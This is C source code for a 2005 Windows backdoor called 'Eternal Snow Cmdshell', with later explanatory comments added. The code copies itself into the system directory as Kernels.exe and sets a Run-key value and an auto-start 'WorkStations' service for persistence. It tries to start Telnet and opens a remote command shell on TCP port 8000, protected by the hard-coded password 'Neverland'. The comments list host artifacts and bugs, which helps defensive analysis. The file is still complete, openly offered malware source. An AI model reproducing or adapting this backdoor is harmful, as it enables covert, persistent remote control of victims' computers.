/*
Delphiscn Eternal Snow Cmdshell Version 1.0
This Backdoor is written by Delphiscn. It supports Windows NT/2000/XP/2003.
You can use nc to control a remote computer which is running this software.
Compiled and Tested in Windows XP SP2 CN. 2000/2003 NOT TESTED.
Can not run in Windows 98/ME
Details
Eternal snow will create a service(Workstations) on the Remote System. And Bind Service Computer on port 8000.
Then . It will also Try to Start Telnet Service in the Remote System which is support for NT.
An Attacker can control it IF he knows the password --Neverland.
Reference
1.msdn
2.www.xFocus.org
More Information
Delphiscn@www.EvilOctal.com
cnBlater(at)hotmail(dot)com
http://spaces.msn.com/members/delphiscn
2005-08-15*/
#include<winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <winsvc.h>
#include <Psapi.h>
#pragma comment( lib,"Psapi.lib")
#pragma comment(lib, "ws2_32.lib")
#define password "Neverland"
BOOL reg(char *szExecFile);
void OnCreate();
void StartTelnet();
void Help();
/*
reg: persistence step. Writes a REG_SZ value named "Kernels", whose data
is szExecFile, under the HKLM key path held in data_Set (the per-machine
Run key). main() passes the path of the system-directory copy of this
program, so the artifact left behind is a Run value "Kernels" pointing
at Kernels.exe in the system directory.
Returns true when the key was opened and either the probe query
succeeded or the write succeeded; false when the key cannot be opened
(KEY_ALL_ACCESS is requested, so this needs write access to HKLM) or
when RegSetValueEx fails. On that last early return neither the malloc'd
buffer nor the key handle is released.
*/
BOOL reg(char *szExecFile)
{
HKEY hKEY;
// Key path exactly as the author wrote it; whether the registry API
// accepts it decides whether anything below runs at all.
LPCTSTR data_Set="SOFTWARE//Microsoft//Windows//CurrentVersion//Run//";
long snow0=(::RegOpenKeyEx(HKEY_LOCAL_MACHINE, data_Set, 0, KEY_ALL_ACCESS,&hKEY));
if(snow0!=ERROR_SUCCESS) return(false);
// 80-byte scratch buffer for the probe query; only freed on the normal
// exit path at the bottom of the function.
LPBYTE username_Get=(unsigned char*)malloc(sizeof(BYTE)*80);
DWORD cbData_1=80;
DWORD dwType;
// Probe for an existing value named "Dlls". Note this is not the name
// written below ("Kernels"), so the probe never sees an earlier write
// from this function; the value is rewritten on every run.
long snow1=::RegQueryValueEx(hKEY,"Dlls", 0,&dwType, username_Get,&cbData_1);
if(snow1!=ERROR_SUCCESS)
{
DWORD setsize;
// REG_SZ data length includes the terminating NUL.
setsize=strlen(szExecFile)+1;
dwType=REG_SZ;
long snow3=::RegSetValueEx(hKEY,"Kernels", 0, dwType, (const unsigned char*) szExecFile, setsize);
// Early return: username_Get is leaked and hKEY is not closed here.
if(snow3!=ERROR_SUCCESS) {return(false);}
}
free(username_Get);
::RegCloseKey(hKEY);
return(true);
}
/*
EnablePrivilege: enables (bEnable != 0) or disables the privilege named
by lpszPrivilegeName on the current process token.
Return values as written: 0 when the process token cannot be opened AND
0 after the adjust call, so success is not distinguishable from that
failure; 1 when LookupPrivilegeValue fails. The result of
AdjustTokenPrivileges is never checked, so a privilege the account does
not hold is silently left unchanged. Both callers in this file pass
SE_DEBUG_NAME and ignore the return value.
*/
int EnablePrivilege(LPCTSTR lpszPrivilegeName,BOOL bEnable)
/*
Thanks to Sunlion[E.S.T]
*/
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
// TOKEN_ADJUST_PRIVILEGES is what the adjust call needs; TOKEN_QUERY and
// TOKEN_READ are requested as well but not used below.
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |
TOKEN_QUERY | TOKEN_READ,&hToken))
return 0;
// Returns 1 here without closing hToken (handle leak on this path).
if(!LookupPrivilegeValue(NULL, lpszPrivilegeName, &luid))
return 1;
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
// Attributes 0 disables the privilege; SE_PRIVILEGE_ENABLED enables it.
tp.Privileges[0].Attributes = (bEnable) ? SE_PRIVILEGE_ENABLED : 0;
// Return value and GetLastError (ERROR_NOT_ALL_ASSIGNED) are not checked.
AdjustTokenPrivileges(hToken,FALSE,&tp,NULL,NULL,NULL);
CloseHandle(hToken);
return 0;
}
/*
Help: prints the program banner to the local console (stdout of the
backdoor process itself, not to the network client).
The "/n" sequences are written with a forward slash, so they are literal
characters rather than newline escapes; the three lines run together.
*/
void Help()
{
printf("Eternal Sonw Cmdshell in Windows NT System Support For 2000/XP/2003 Version 1.0/n");
printf("CODE BY Delphiscn@www.EvilOctal.com E-mail:cnBlaster(at)hotmail(dot)com/n");
printf("Complied in Windows XP SP2 CN 2005-08");
return;
}
/*
main: installer followed by a single-client TCP bind shell.
Installation phase, in order:
  - copies the running image to <system directory>//Kernels.exe when the
    current image path differs from that target,
  - writes the Run-key value through reg() and exits if that fails,
  - creates the "WorkStations" service through OnCreate(),
  - attempts to start the "Telnet" service through StartTelnet().
Network phase: listens on TCP port 8000 on all interfaces, accepts
exactly one client (there is no loop around accept), asks for the
password macro ("Neverland") and then relays bytes between the client
socket and the stdin/stdout pipes of a child process started from the
command line "Kernels.exe".
Returns 0 after the relay loop ends, -1 when WSAStartup or accept fails,
0 when reg() fails. Host artifacts a defender can expect from this
function: Kernels.exe in the system directory, a Run value named
"Kernels", a service named "WorkStations", a listener on port 8000.
*/
int main(int argc,char *argv[])
{
// Overwrites the storage behind argv[0] with the full module path,
// assuming it can hold 255 bytes. That buffer belongs to the C runtime
// and its size is not known here — TODO confirm this does not overflow.
GetModuleFileName(NULL,argv[0],255);
char szNewPlace[255];
GetSystemDirectory(szNewPlace,255);
// Target path is the system directory with the literal "//Kernels.exe"
// appended, exactly as written; no bounds check on the strcat.
strcat(szNewPlace,"//Kernels.exe");
// Self-copy only when not already running from the target path.
// bFailIfExists is FALSE, so an existing file is overwritten; the
// CopyFile result is not checked.
if( strcmp(argv[0],szNewPlace) != 0 )
{CopyFile(argv[0],szNewPlace,FALSE);}
// Registry persistence. If it fails nothing else in this function runs:
// no service creation, no listener.
if(!reg(szNewPlace))
{return 0;}
OnCreate();
StartTelnet();
// Shells out to "cls.exe"; result ignored.
system("cls.exe");
Help();
WSADATA wsaData;
// 4096-byte buffer, but every recv/ReadFile below uses at most 1024.
// It is never zeroed and never NUL-terminated.
char buff[4096];
int Eternal;
if ((Eternal = WSAStartup(MAKEWORD(2,2), &wsaData)) != 0)
{
printf("WSAStartup Failed: %d/n",Eternal);
return -1;
}
// WSACleanup is never called on any path out of this function.
int port=8000;
// Stored as int although socket() returns SOCKET; INVALID_SOCKET is
// compared against the int below.
int RemoteServer,LocalClient;
struct sockaddr_in addrServer,addrClient;
// Banner strings: "/n/r" is written with forward slashes, so these are
// literal characters on the wire rather than CR/LF.
char *MSG="/n/r Welcome Hacker";
char *getpass="/r/n Your Password is:";
char *passok="/r/n ok";
char *error="/r/n Error Password Please Try it again";
RemoteServer=socket(AF_INET,SOCK_STREAM,0);
addrServer.sin_family=AF_INET;
addrServer.sin_port=htons(port);
// All interfaces.
addrServer.sin_addr.s_addr=ADDR_ANY;
// 50 s receive timeout on the listening socket (milliseconds on Winsock).
int TimeOut=50000;
setsockopt(RemoteServer,SOL_SOCKET,SO_RCVTIMEO,(char*)&TimeOut,sizeof(TimeOut));
UINT bReUser=1;
setsockopt(RemoteServer,SOL_SOCKET,SO_REUSEADDR,(char*)&bReUser,sizeof(bReUser));
// bind() and listen() results are not checked: a failed bind (port in
// use, insufficient rights) still prints "OK" and proceeds to accept.
bind(RemoteServer,(struct sockaddr*)&addrServer,sizeof(addrServer));
listen(RemoteServer,5);
printf("Bind Server is OK/n%d",port);
int iLen=sizeof(addrClient);
// Blocks until one client connects; only this first connection is ever
// served. On failure the listening socket is not closed before return.
LocalClient=accept(RemoteServer,(struct sockaddr*)&addrClient,&iLen);
if (LocalClient != INVALID_SOCKET)
{
// Same 50 s receive timeout on the accepted socket; this also bounds
// how long the relay loop below blocks in recv.
int iTimeOut=50000;
setsockopt(LocalClient,SOL_SOCKET,SO_RCVTIMEO,(char*)&iTimeOut,sizeof(iTimeOut));
}
else return -1;
send(LocalClient,MSG,strlen(MSG),0);
send(LocalClient,getpass,strlen(getpass),0);
// Reads up to 1024 bytes; the byte count is discarded and buff is not
// terminated, so strstr below scans whatever bytes happen to be in buff
// (including uninitialized ones) until it finds a NUL.
recv(LocalClient,buff,1024,0);
// Password gate: substring match of the macro anywhere in buff.
if(!(strstr(buff,password)))
{
send(LocalClient, error, strlen(error), 0);
printf("/r/n PassWord ERROR!");
// The socket is closed but there is no return here, so execution falls
// through to the pipe/process setup with a closed client socket; the
// later send/recv calls fail on it (see the recv note in the loop).
closesocket(LocalClient);
}
send(LocalClient, passok, strlen(passok), 0);
HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
// Declared uninitialized; first written by PeekNamedPipe in the loop.
unsigned long lBytesRead;
SECURITY_ATTRIBUTES sa;
// Hard-coded 12 rather than sizeof(SECURITY_ATTRIBUTES); 12 presumably
// matches the 32-bit layout the author built for — confirm for 64-bit.
sa.nLength=12;
sa.lpSecurityDescriptor=0;
// Both ends of both pipes are created inheritable.
sa.bInheritHandle=TRUE;
// Pipe 1: child stdout/stderr -> parent (hReadPipe1 read by the loop).
// Pipe 2: parent -> child stdin (hWritePipe2 written by the loop).
// Return values are not checked.
CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0);
CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0);
STARTUPINFO siinfo;
// Child command line is the literal "Kernels.exe" — the same image name
// this program installs itself under. lpApplicationName is NULL, so
// CreateProcess resolves it through its normal search order.
char cmdLine[] = "Kernels.exe";
PROCESS_INFORMATION ProcessInformation;
// siinfo.cb is never set after the ZeroMemory (stays 0).
ZeroMemory(&siinfo,sizeof(siinfo));
siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
siinfo.wShowWindow = SW_HIDE;
siinfo.hStdInput = hReadPipe2;
siinfo.hStdOutput = siinfo.hStdError = hWritePipe1;
printf("/r/n Pipe Create OK!");
// bInheritHandles = 1: the child inherits all four pipe handles. The
// result is stored in bread but never tested, so the loop runs even if
// no child was started.
int bread = CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation);
// Relay loop: child output -> client when the pipe has data, otherwise
// block in recv (up to the 50 s timeout) and feed client input to the
// child's stdin. Busy-polls; no WaitForMultipleObjects or similar.
while(1)
{
// Fourth argument receives the number of bytes the peek copied (at most
// 1024); the peek's own success flag in ret is overwritten unchecked.
int ret = PeekNamedPipe(hReadPipe1,buff,1024,&lBytesRead,0,0);
if(lBytesRead)
{
ret = ReadFile(hReadPipe1,buff,lBytesRead,&lBytesRead,0);
if(!ret) break;
ret = send(LocalClient,buff,lBytesRead,0);
if(ret <= 0) break;
}
else
{
// recv returns int but is stored in an unsigned long: a SOCKET_ERROR
// result (-1) becomes a large positive value, does not satisfy the
// `<= 0` test below, and is then passed to WriteFile as the length.
// Only a clean close (0) ends the loop on this branch.
lBytesRead = recv(LocalClient,buff,1024,0);
if(lBytesRead <= 0) break;
// WriteFile result ignored.
ret = WriteFile(hWritePipe2,buff,lBytesRead,&lBytesRead,0);
}
}
// Sockets are closed; the four pipe handles and the process/thread
// handles in ProcessInformation are not, and the child is left running.
closesocket(LocalClient);
closesocket(RemoteServer);
return 0;
}
/*
OnCreate: registers the system-directory copy of this program as a
Windows service named "WorkStations" (display name "WorkStations"),
SERVICE_AUTO_START, own process with the interactive flag, error
control IGNORE. The service is only created here, never started, and
the result is not reported to the caller (void return, no logging).
Requires SC_MANAGER_ALL_ACCESS on the service control manager.
Host artifact: service "WorkStations" whose binary path is Kernels.exe
in the system directory.
*/
void OnCreate()
{
char szNewPlace[255];
GetSystemDirectory(szNewPlace,255);
// Same path construction as in main(); no bounds check on the strcat.
strcat(szNewPlace,"//Kernels.exe");
// Return value ignored (see EnablePrivilege: it cannot report success).
EnablePrivilege(SE_DEBUG_NAME,TRUE);
SC_HANDLE scm;
SC_HANDLE scv;
scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if (scm!=NULL)
{
scv=::CreateService(scm,
"WorkStations",
"WorkStations",
SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS,SERVICE_INTERACTIVE_PROCESS,
SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,
szNewPlace,
NULL,NULL,NULL,NULL);
// Handle hygiene is asymmetric: on success only the service handle is
// closed and the SCM handle is leaked; on failure only the SCM handle
// is closed. (A service that already exists makes CreateService fail.)
if (scv!=NULL)
{
::CloseServiceHandle(scv);
}
else
{
::CloseServiceHandle(scm);
}
}
}
/*
StartTelnet: opens the existing service named "Telnet" with
SERVICE_ALL_ACCESS and asks the SCM to start it. Nothing is created or
reconfigured here: if the service is absent OpenService returns NULL and
the function does nothing. The StartService result is ignored, so a
disabled or already-running Telnet service is indistinguishable from a
successful start to the caller.
*/
void StartTelnet()
{
// Return value ignored (see EnablePrivilege).
EnablePrivilege(SE_DEBUG_NAME,TRUE);
SC_HANDLE scm;
SC_HANDLE scv;
scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if(scm!=NULL)
{
scv=::OpenService(scm,"Telnet",SERVICE_ALL_ACCESS);
if (scv!=NULL)
{
// No arguments passed to the service; success not checked.
::StartService(scv,0,NULL);
::CloseServiceHandle(scv);
}
// Unlike OnCreate, the SCM handle is closed on every path here.
::CloseServiceHandle(scm);
}
}
/*
Compiled with Visual C++.Net
Good Luck ^.^
*/